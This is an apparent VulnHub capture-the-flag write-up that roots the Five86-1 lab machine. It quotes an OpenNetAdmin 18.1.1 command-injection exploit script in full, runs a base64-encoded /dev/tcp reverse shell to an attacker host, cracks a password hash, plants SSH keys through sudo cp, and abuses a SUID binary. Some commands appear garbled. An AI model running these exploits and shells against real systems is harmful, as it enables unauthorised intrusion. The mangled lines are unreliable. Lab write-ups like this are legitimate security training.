Five86-1 - VulnHub
Basic TCP port scanning
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# nmap -sS --min-rate 5000 -v -n -Pn --open 192.168.1.139 -oN ports
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 14:45 EST
Initiating ARP Ping Scan at 14:45
Scanning 192.168.1.139 [1 port]
Completed ARP Ping Scan at 14:45, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 14:45
Scanning 192.168.1.139 [1000 ports]
Discovered open port 80/tcp on 192.168.1.139
Discovered open port 22/tcp on 192.168.1.139
Discovered open port 10000/tcp on 192.168.1.139
Completed SYN Stealth Scan at 14:45, 0.08s elapsed (1000 total ports)
Nmap scan report for 192.168.1.139
Host is up (0.000099s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
10000/tcp open snet-sensor-mgmt
MAC Address: 08:00:27:34:7E:BF (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds
Raw packets sent: 1001 (44.028KB) | Rcvd: 1001 (40.040KB)
This scan reported me 3 open ports: 22,80 and 10000. Two web servers and SSH.
Basic TCP service scanning
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# nmap -sCV -p22,80,10000 192.168.1.139 -oN services
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-08 14:46 EST
Nmap scan report for 192.168.1.139
Host is up (0.00022s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 69e63cbf72f7a000f9d9f41d68e23cbd (RSA)
| 256 459ec71e9f5bd3cefc1756f2f642abdc (ECDSA)
|_ 256 ae0a9e92645f8620c41144e05832e505 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_/then
10000/tcp open http MiniServ 1.920 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
MAC Address: 08:00:27:34:7E:BF (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.54 seconds
This second service scan reported me a /robots.txt and a potential path in it /ona. The SSH and Apache versions were not vulnerable a priori, so I decided to access port 80.
Nothing interesting, a blank page, I proceeded to view port 10000.
I had a login panel to Webmin, I tried basic credentials: admin, admin and they did not work, knowing the version of this service I looked for vulnerabilities.
I found a remote command execution exploit without authentication but it didn’t apply.
I continued my investigation by looking at robots.txt.
This was where the route previously reported by nmap was located, so nothing interesting from there on. Accessing the route /ona I found the following:
Something interesting I saw is that we are authenticated as a guest user.
At the top right I was told what this panel was about, it was OpenNetAdmin, a service for network management. At this point I was interested in knowing the version of it to look for exploits of it.
It was version 18.1.1 of this, search for exploits with searchsploit.
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# searchsploit opennetadmin
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenNetAdmin 13.03.01 - Remote Code Execution | php/webapps/26682.txt
OpenNetAdmin 18.1.1 - Command Injection Exploit (Metasploit) | php/webapps/47772.rb
OpenNetAdmin 18.1.1 - Remote Code Execution | php/webapps/47691.sh
----------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
I found 3 exploits, 2 that were supposed to work, one from Metasploit. I downloaded the bash script.
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# searchsploit -m php/webapps/47691.sh
Exploit: OpenNetAdmin 18.1.1 - Remote Code Execution
URL: https://www.exploit-db.com/exploits/47691
Path: /usr/share/exploitdb/exploits/php/webapps/47691.sh
Codes: N/A
Verified: False
File Type: ASCII text
Copied to: /home/kali/Vulnhub/Five86/47691.sh
The exploit code is as follows:
# Exploit Title: OpenNetAdmin 18.1.1 - Remote Code Execution
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
# Exploit Title: OpenNetAdmin v18.1.1 RCE
# Date: 2019-11-19
# Exploit Author: mattpascoe
# Vendor Homepage: http://opennetadmin.com/
# Software Link: https://github.com/opennetadmin/ona
# Version: v18.1.1
# Tested on: Linux
#!/bin/bash
URL="${1}"
while true;do
echo -n "$ "; read cmd
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
done
The structure of this exploit is as follows:
- Takes the first argument passed to *exploit* (The server URL) and stores it as `URL`
- Starts an infinite loop followed by an *input* that saves the command we want to execute in the variable `cmd`.
- Sends a prepared request and filters the output of the previously entered command using regular expressions.
If we try to execute the curl command replacing URL and cmd we will see that we get remote command execution, in this case we are the user www-data.
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";whoami;echo \"END\"&xajaxargs[]=ping" "http://192.168.1.139/ona/" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
www-data
So I tried to get a reverse shell and it gave me problems, so the way that worked for me is the following. The first thing I did was to base64 encode the code that would make the machine connect to me.
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# echo "sh -i >& /dev/tcp/192.168.1.136/443 0>&1" | base64
c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjEzNi80NDMgMD4mMQo=
And now just decode the string to Base64 and pipe the result into bash.
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# curl --silent -d "submit=window_submitr=1574117726710&submit[]=tooltips[]=ip%3D%3Echo \"BEGIN\";echo c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjEzNi80NDMgMD4mMQo= |.bash\"END\"&xajaxargs[]=ping" | sed -n -e '/BEGINNING/,/END/ p' | tail -n +2 | head -n -1
Run the command and gain access as www-data.
┌──(root㉿kali)-[/home/kali]
└─# nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.136] from (UNKNOWN) [192.168.1.139] 37480
sh: 0: can't access tty; job control turned off
$ whoami
www-data
I did a TTY treatment to have more comfort with it.
$ script /dev/null -c bash
Script started, file is /dev/null
www-data@five86-1:/opt/ona/www$ ^Z
zsh: suspended nc -lvnp 443
┌──(root㉿kali)-[/home/kali]
└─# stty raw -echo; fg
[1] + continued nc -lvnp 443
reset
reset: unknown terminal type unknown
Terminal type? xterm
I also had to change the rows and columns that this one had, on my machine it had 17 and 157.
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# stty size
17 157a
And on the victim machine 24 and 80.
www-data@five86-1:/opt/ona/www$ export TERM=xterm
www-data@five86-1:/opt/ona/www$ export SHELL=bash
www-data@five86-1:/opt/ona/www$ stty size
24 80
www-data@five86-1:/opt/ona/www$ stty rows 17 columns 157
I saw what files were in the current directory but nothing interesting.
www-data@five86-1:/opt/ona/www$ ls
config config_dnld.php dcm.php images include index.php local login.php logout.php modules plugins winc workspace_plugins
www-data@five86-1:/opt/ona/www$
After a little research I found a .htpasswd in /var/www/ that I had read permissions on.
www-data@five86-1:/var/www$ ls
html
www-data@five86-1:/var/www$ ls -la
total 16
drwxr-xr-x 3 root root 4096 Jan 1 2020 .
drwxr-xr-x 14 root root 4096 Jan 1 2020 ..
-rw-r--r-- 1 root root 202 Jan 1 2020 .htpasswd
drwxr-xr-x 3 root root 4096 Jan 1 2020 html
www-data@five86-1:/var/www$
Its content was as follows:
www-data@five86-1:/var/www$ cat .htpasswd
douglas:$apr1$9fgG/hiM$BtsL9qpNHUlylaLxk81qY1
# To make things slightly less painful (a standard dictionary will likely fail),
# use the following character set for this 10 character password: aefhrt
There was a username and a hash. There was also a message saying that a conventional dictionary like rockyou.txt would fail to crack this hash and that I could use the characters aefhrt with a ten character password pattern to crack it. Basically what I needed to do was generate a dictionary of credentials with a 10 character pattern that explicitly contained those characters.
What I did was run crunch specifying the minimum and maximum characters required followed by the string provided by the .htpasswd. Finally I exported the result to the pass.txt file.
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# crunch 10 10 aefhrt -o pass.txt
Crunch will now generate the following amount of data: 665127936 bytes
634 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 60466176
crunch: 100% completed generating output
Once the dictionary was generated I realized that it was much larger than rockyou.txt.
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# wc -l pass.txt
60466176 pass.txt
This would take a long time to complete. What I did was make it shorter, since the crunch command I used generated credentials that contain some of the characters I specified, not all of them. So I applied the following regular expression to filter for all credentials that contain aefhrt.
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# awk '/a/&&/e/&&/f/&&/h/&&/r/&&/t/' pass.txt > pass_final.txt
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# wc -l pass_final.txt
16435440 pass_final.txt
Now that you have a lot less credentials, start the attack with john.
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# john --wordlist=pass_final.txt hash
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
fatherrrrr (douglas)
1g 0:00:00:23 DONE (2023-03-08 15:27) 0.04295g/s 254251p/s 254251c/s 254251C/s fatherrhaf..fatherttae
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Well, I managed to crack the password: fatherrrrr. I noticed that douglas was an active user on the system, so I tried to authenticate with this credential and it worked.
www-data@five86-1:/var/www$ su douglas
Password:
douglas@five86-1:/var/www$ whoami
douglas
Being Douglas I searched for all files and directories from root that I owned and removed the proc and sys strings that are obtained in the output of the command, but I found nothing interesting.
douglas@five86-1:/var/www$ find / -user douglas 2>/dev/null | grep -vE 'proc|sys'
/run/user/1005
/home/douglas
/home/douglas/.ssh
/home/douglas/.ssh/id_rsa.pub
/home/douglas/.ssh/id_rsa
/home/douglas/.bash_history
/home/douglas/.local
/home/douglas/.local/share
/home/douglas/.local/share/nano
I realized I could run /bin/cp as the user Jen.
douglas@five86-1:~$ sudo -l
Matching Defaults entries for douglas on five86-1:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User douglas may run the following commands on five86-1:
(only) NOPASSWD: /bin/cp
There are two ways to try to escalate at this point by taking advantage of the naturalness of SSH:
- Copy the private key (if any) of user jen to /tmp and try to access via SSH using this as the identity key (if it was not encrypted).
- Copy my public key and store it as authorized_keys in jen's .ssh directory for SSH access without credentials.
In this specific case I used the second option, the user jen did not have an id_rsa in /home/jen/.ssh/jen.
┌──(root㉿kali)-[~/.ssh]
└─# cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDOemMao95qmTqEbnpcgdykoWnGz4UQvtp0pJZ7bCCA/xJ+QLc0LNDlGcEZ9ldlVY12RZVywrdq407MnkrRf+BQ6WvBXVFm+mAkLrtuJuvBQDdeaSRx3qs4woRj1PScD/7886OOXuPao8dJTreBI5hgE2ZAzgJMmO+uwCBF1wJQlI2RgrGzrS2XSjasrY+PwSti/DT/UjlQdrtWlytQua38t4+cRoOvhe2G1nktInYeq0cQtjqm8t5WM7r0FCAvh4DY3nGEtaCS82YRTVhAEHQXgPPwL19Y2EEKWttx4RvtKaHry2ncjgJUOcSNLoLZffNCpyF4cm2+Bcm0Da5Jr9x4UW0dlX6oShtm3+AMTJ5VDJ+L+vVPp90aRdvReMEL4zvqB3775CL4B3Jg49KqmXbLfbTKWwdSKMQHJNGGUj4PUTjUvbkAhi6lqqGS4x81xHOfOH9DDV1aY28pojxF2iD6bBhWBoqdYdRrQ1eyIo/uyEi3UM1Wbzzdk7sdpxVmXmU= root@kali
Once I had my public key in /tmp as authorized_keys I copied it to /home/jen/.ssh/authorized_keys as the user jen.
douglas@five86-1:/tmp$ ls
authorized_keys tmp.z1IYvnHLGU
douglas@five86-1:/tmp$ cat authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDOemMao95qmTqEbnpcgdykoWnGz4UQvtp0pJZ7bCCA/xJ+QLc0LNDlGcEZ9ldlVY12RZVywrdq407MnkrRf+BQ6WvBXVFm+mAkLrtuJuvBQDdeaSRx3qs4woRj1PScD/7886OOXuPao8dJTreBI5hgE2ZAzgJMmO+uwCBF1wJQlI2RgrGzrS2XSjasrY+PwSti/DT/UjlQdrtWlytQua38t4+cRoOvhe2G1nktInYeq0cQtjqm8t5WM7r0FCAvh4DY3nGEtaCS82YRTVhAEHQXgPPwL19Y2EEKWttx4RvtKaHry2ncjgJUOcSNLoLZffNCpyF4cm2+Bcm0Da5Jr9x4UW0dlX6oShtm3+AMTJ5VDJ+L+vVPp90aRdvReMEL4zvqB3775CL4B3Jg49KqmXbLfbTKWwdSKMQHJNGGUj4PUTjUvbkAhi6lqqGS4x81xHOfOH9DDV1aY28pojxF2iD6bBhWBoqdYdRrQ1eyIo/uyEi3UM1Wbzzdk7sdpxVmXmU= root@kali
douglas@five86-1:/tmp$ sudo -u jen /bin/cp authorized_keys /home/jen/.ssh/authorized_keys
Now I simply log in via SSH without credentials as the user jen.
┌──(root㉿kali)-[/home/kali/Vulnhub/Five86]
└─# ssh jen@192.168.1.139
Linux five86-1 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Tue Mar 7 19:21:42 2023 from 192.168.1.136
just@five86-1:~$
Again I did another search for all files and directories that jen owned, removing the proc and sys strings.
jen@five86-1:~$ find / -user jen 2>/dev/null | grep -vE "proc|sys"
/run/user/1003
/var/mail/jen
/dev/pts/1
/home/jen
/home/jen/.ssh
/home/jen/.ssh/authorized_keys
/home/jen/reports
/home/jen/reports/Audit.txt
/home/jen/reports/IT_Budget.txt
/home/jen/.bash_history
In this case I did find a path that interested me: /var/mail/jen. It was an email from Roy to Jen informing her that Moss’s (system user) password was Fire!Fire!.
jen@five86-1:~$ cat /var/mail/jen
From roy@five86-1 Wed Jan 01 03:17:00 2020
Return-path: <roy@five86-1>
Envelope-to: jen@five86-1
Delivery-date: Wed, 01 Jan 2020 03:17:00 -0500
Received: from roy by five86-1 with local (Exim 4.92)
(envelope-from <roy@five86-1>)
id 1imZBc-0001FU-El
for jen@five86-1; Wed, 01 Jan 2020 03:17:00 -0500
This: jen@five86-1
Subject: Monday Moss
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1imZBc-0001FU-El@five86-1>
From: Roy Trenneman <roy@five86-1>
Date: Wed, 01 Jan 2020 03:17:00 -0500
Hi Jen,
As you know, I'll be on the "customer service" course on Monday due to that incident on Level 4 with the accounts people.
But anyway, I had to change Moss's password earlier today, so when Moss is back on Monday morning, can you let him know that his password is now Fire!Fire!
Moss will understand (ha ha ha ha).
Tanks,
Roy
I tried to authenticate with that credential to the user Moss and it was successful.
jen@five86-1:~$ ls /home
douglas jen moss richmond roy
jen@five86-1:~$ su moss
Password:
moss@five86-1:/home/jen$ whoami
moss
moss@five86-1:/home/jen$
Being Moss I searched for all the binaries that are running as SUID and found a supposed “game”.
moss@five86-1:~$ find / -perm -4755 2>/dev/null
/var/games/animals
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/su
/usr/bin/umount
/usr/bin/mount
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/chfn
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/sbin/exim4
/home/moss/.games/upyourgame
I ran it, answered 5 questions with “yes” and automatically gained root access 😞 . It seemed like a joke but it did turn me into root.
moss@five86-1:/var/games/animals$ /home/moss/.games/upyourgame
Would you like to play a game? yes
Could you please repeat that? yes
Nope, you'll need to enter that again. yes
You entered: No. Is this correct? yes
We appear to have a problem? Do we have a problem? yes
Made in Britain.
# whoami
root
#
I looked deeper into the binary code in Ghidra and it looked like this:
It simply asks the questions and reads the user input into the corresponding variables, at the end of the program it changes the UID to 0 (root) and spawns a /bin/sh.
Leave a comment